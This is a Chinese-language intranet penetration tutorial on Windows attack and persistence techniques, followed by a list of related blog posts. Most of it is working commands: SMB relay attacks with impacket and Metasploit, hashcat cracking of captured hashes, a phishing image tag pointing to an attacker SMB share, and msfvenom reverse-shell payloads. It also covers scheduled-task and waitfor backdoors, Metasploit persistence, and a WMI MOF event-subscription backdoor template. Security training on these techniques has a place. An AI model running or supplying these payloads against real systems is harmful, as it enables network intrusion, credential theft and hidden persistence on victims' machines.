0x01.综合利用手法

1.Smbrelay

smbrelayx.py
由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器:

nmap -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.91.0/24


关闭SMB签名方法:
修改注册表后重新启动:

注册表位置
HKEY_LOCAL_MACHIME\System\CurrentControlSet\Services\LanManServer\Paramete

EnableSecuritySignature = 0
RequireSecuritySignature = 0

使用impacket中的smbrelayx.py进行中继攻击,目标是192.168.91.131:(第一次使用需要安装 pip install .)

python smbrelayx.py -h 192.168.91.131 -c calc.exe

当其他服务器使用相同的密码访问此服务器时:192.168.91.128为kali

net use \\192.168.91.128/user:"Administrator" "ABCabc123"

Kali接收到Hash:

目标服务器出现calc进程:

可以将hash粘贴出来,使用hashcat进行字典攻击:

hashcat64.exe -a 0 -m 5600 hash.txt pass.txt

可制作钓鱼网站,包含以下内容

<img src="\\192.168.91.128\Admin$">

启动服务:

python smbrelayx.py -h 192.168.91.131

用户访问时:

2.smb_relay(MSF)

msfconsole
use exploit/windows/smb/smb_relay
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.41
set smbhost 192.168.111.150
run

当其他机器访问Kali的共享时,可获得目标机器的shell:

net use \\192.168.91.128/user:"Administrator" "ABCabc123"

sessions

sessions -i 1


可以搭配NBNS欺骗、DNS欺骗使用

0x02.Waitfor后门

net use * /delete  //清空共享
waitfor 123456 && calc.exe         //本地执行
waitfor /s 127.0.0.1 /si college    //测试
waitfor /s 192.168.91.131 /si 123456 /U Administrator /P ABCabc123

0x03.At && Schtasks(需要管理员权限)

先生成一个远控程序:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=4444 -f exe -o backdoor.exe

-x putty.exe -k (先执行程序,在执行后门)


将远控程序上传至服务器,使用schtasks,要求在用户登录时执行程序,返回shell。

schtasks /create /tn hello /tr C:\Users\admin\Desktop\backdoor.exe /sc onlogon /ru system

用户登录时,成功反弹shell

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 4444
run

0x03.Metasploit后门模块

当获得了一个meterpreter时,可设置后门程序:

background
use exploit/windows/local/persistenceshow
options

set session 6
set delay 60run

0x04.WMI+MOF

假设已经获得了管理员权限,可构造MOF后门,MOF文件模板如下:1.mof

#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{Name = "Powershell Helper";RunInteractively=false;CommandLineTemplate="cmd /C 命令";
};
instance of __EventFilter as $Filt
{Name = "EventFilter";EventNamespace = "Root\\Cimv2";Query ="SELECT * FROM __InstanceCreationEvent Within 5" "Where TargetInstance Isa \"Win32_Process\" ""And Targetinstance.Name = \"notepad.exe\" ";QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {Filter = $Filt;Consumer = $Cons;
};

利用msfvenom生成powershell反弹shell的命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=6677 -f psh-cmd

将生成的powershell部分替换模板中的“命令”部分:


将mof上传至服务器,在服务器中以管理员身份启动CMD,运行:

mofcomp 1.mof

监听端口,待服务器打开notepad.exe:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 6677
run


其他事件,实测只能监听一个事件:
关闭powershell:

#!sql"SELECT * FROM __InstanceDeletionEvent Within 5 " "Where TargetInstance Isa \"Win32_Process\" ""And Targetinstance.Name = \"powershell.exe\" ";

每小时的30分钟:

#!sql"Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Minute = 30 "

内网渗透----常见后门相关推荐

  1. 【湃哒星说安全】工作组环境中进行内网渗透常见方法总结

    0x01 工作组定义 工作组是一组计算机的集合,工作组中的计算机没有中央身份验证在网络中的地位平等,工作组中的每台计算机都充当客户端和服务器,每台机器的账号密码只是保存在自己的SAM文件中,当工作组中 ...

  2. 1.我所了解的内网渗透

    最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记. 开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享:https://www.ichunqiu.co ...

  3. 内网渗透系列之mimikatz的使用以及后门植入

    内网渗透系列之mimikatz的使用以及后门植入 文章目录 内网渗透系列之mimikatz的使用以及后门植入 前言 mimikatz的使用 后门植入 msf永久后门植入 (1)Meterpreter后 ...

  4. 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...

    1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...

  5. pyqt 把控制台信息显示到_内网渗透初识—信息收集

    进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备 PS:文中提到的PowerSploit 本机信息 包括操作系统,当前用户权限,内网 ...

  6. 内网渗透-域渗透简单思路

    文章目录 1.权限提升 2.渗透姿势 爆hash,爆aes key 爆hash 爆aes key 3.远程登录 注册表修改 连接命令 4.连接操作 PTH攻击(利用明文或hash连接) IPC(明文连 ...

  7. linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结

    在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...

  8. 内网安全-常见横向移动总结

    域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳 ...

  9. 小迪渗透内网渗透(玖)

    文章目录 65. 域环境&工作组&局域网方针(65-72) 演示案例: 涉及资源: 66. 横向批量&schtasks&im&packet 演示案例: 涉及资源 ...

最新文章

  1. svn update 报错,必须先cleanup,然后cleanup失败解决方法
  2. CssVariables_01
  3. 数控车椭圆编程实例带图_数控车床任意位置椭圆宏程序编程,内附实例程序!...
  4. 工业接口RS-485的设计应用指南
  5. .net core 生成二维码
  6. c# 无法将类型隐式转换_C#中的隐式类型数组
  7. Linux-在linux修改文件夹及其子文件夹的权限
  8. js有没有类似php的sleep函数,JavaScript-jQuery有没有类似sleep方法?
  9. andriod开发中的几个基本概念及关系SDK ADT Platform API
  10. 这篇带你深入理解SpringBoot中的自动装配(好文精读)
  11. [过年菜谱之]清蒸鲈鱼
  12. Redis单机版半自动安装
  13. 【机器学习】逻辑回归原理及其实现
  14. 开源的胜利:意大利法院判定开源协议条款可强制执行
  15. win32 粒子编辑器
  16. 深度学习之Bias/Variance偏差、方差
  17. Java文字转语音功能实现
  18. 记一次mysql5.7的新特性derived_merge的坑
  19. inc si指令的作用_8086指令
  20. 应届毕业生找java初级开发工作需要掌握哪些知识或者技术?

热门文章

  1. 前端工程师能够用很低的学习本钱来运用它完成常用的效劳端代码
  2. 多目标优化算法:多目标北方苍鹰优化算法MONGO(提供MATLAB代码)
  3. jquey javascript 绑定点击事件(click事件无反应,因js获取不到当前的点击项)
  4. 埃森哲java开发怎么样_花费2亿,耗时2年,网站还没建完,咨询公司埃森哲被告上法庭!...
  5. 通过买新电脑a时买的正版Windows 10 pro for OEM key升级电脑b操作系统Windows 10 home 到 专业版pro
  6. Android工程师级别和学习路线
  7. linux服务器如何测试网速
  8. TopOpt | 针对99行改进的88行拓扑优化程序完全注释
  9. 明日之后找回原来的服务器,明日之后怎么找回原来的账号
  10. 【黑金ZYNQ7000系列原创视频教程】07.自定义IPmdash;mdash;定制RTC IP实验